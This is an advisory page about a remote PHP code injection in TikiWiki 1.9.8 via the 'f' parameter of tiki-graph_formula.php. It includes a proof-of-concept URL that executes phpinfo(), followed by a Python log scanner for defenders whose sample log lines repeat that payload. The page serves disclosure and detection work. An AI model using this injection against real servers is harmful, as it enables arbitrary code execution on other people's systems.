Vendor: TikiWiki
By: milw0rm.com
CVSS: 7.5 HIGH
Remote PHP Injection
CWE: 94
Product Name: TikiWiki
Affected Version From: 1.9.8
Affected Version To: 1.9.8
Patch Exists: NO
Related CWE:
CPE: a:tikiwiki:tikiwiki:1.9.8
Metasploit:
Other Scripts:
Platforms Tested:
2007

TikiWiki 1.9.8 Remote PHP Injection Vulnerability

This vulnerability allows a remote attacker to inject and execute arbitrary PHP code in TikiWiki version 1.9.8. The injection point is the 'f' parameter of tiki-graph_formula.php: by manipulating its value in the URL, an attacker can execute PHP code of their choice.

Mitigation:

Upgrade to a patched version of TikiWiki or apply a security patch provided by the vendor.
Source

Exploit-DB raw data:

TikiWiki 1.9.8 Remote PHP Injection Vulnerability

Example: http:/server/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=

# milw0rm.com [2007-10-10]
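
For defenders reviewing web server logs, requests of the shape described above can be found by decoding the 'f' parameter of tiki-graph_formula.php and checking it against what a graph formula should contain. The following Python is an added example, not part of the original advisory or of TikiWiki; the allow-list of formula names, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: legitimate formulas use only x, numbers, arithmetic operators and
# these math names. The list is illustrative, not taken from TikiWiki.
ALLOWED_WORDS = {"x", "sin", "cos", "tan", "sqrt", "abs", "exp", "log", "pi"}
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
WORD_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
ODD_CHAR_RE = re.compile(r"[^\w\s.+\-*/^(),]")  # anything outside formula syntax

def suspicious_formulas(target):
    """Return decoded f / f[] values of a tiki-graph_formula.php request
    that contain names outside ALLOWED_WORDS or unexpected characters."""
    url = urlsplit(target)
    if not url.path.endswith("/tiki-graph_formula.php"):
        return []
    hits = []
    # parse_qsl percent-decodes keys and values, so f%5B%5D is seen as f[]
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key.split("[", 1)[0] != "f":
            continue
        unknown = [w for w in WORD_RE.findall(value) if w.lower() not in ALLOWED_WORDS]
        if unknown or ODD_CHAR_RE.search(value):
            hits.append(value)
    return hits

def scan(log_lines):
    """Return (client, formula) pairs for every flagged request line."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if m:
            findings += [(m.group(1), f) for f in suspicious_formulas(m.group(2))]
    return findings

# Constructed access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2007:10:00:01 +0000] "GET /tikiwiki/tiki-graph_formula.php?w=300&h=200&s=1&min=0&max=10&f[]=sin(x)&t=png&title=demo HTTP/1.1" 200 1432',
    '198.51.100.7 - - [10/Oct/2007:10:00:05 +0000] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title= HTTP/1.1" 200 51234',
    '198.51.100.7 - - [10/Oct/2007:10:00:09 +0000] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f%5B%5D=x.tan.phpinfo%28%29&t=png&title= HTTP/1.1" 200 51234',
    '203.0.113.4 - - [10/Oct/2007:10:01:00 +0000] "GET /tikiwiki/tiki-index.php HTTP/1.1" 200 8120',
]

if __name__ == "__main__":
    for client, formula in scan(SAMPLE_LOG):
        print(f"{client} suspicious formula: {formula}")
```

The allow-list should be adjusted to the formulas a given site actually uses before the findings are treated as alerts.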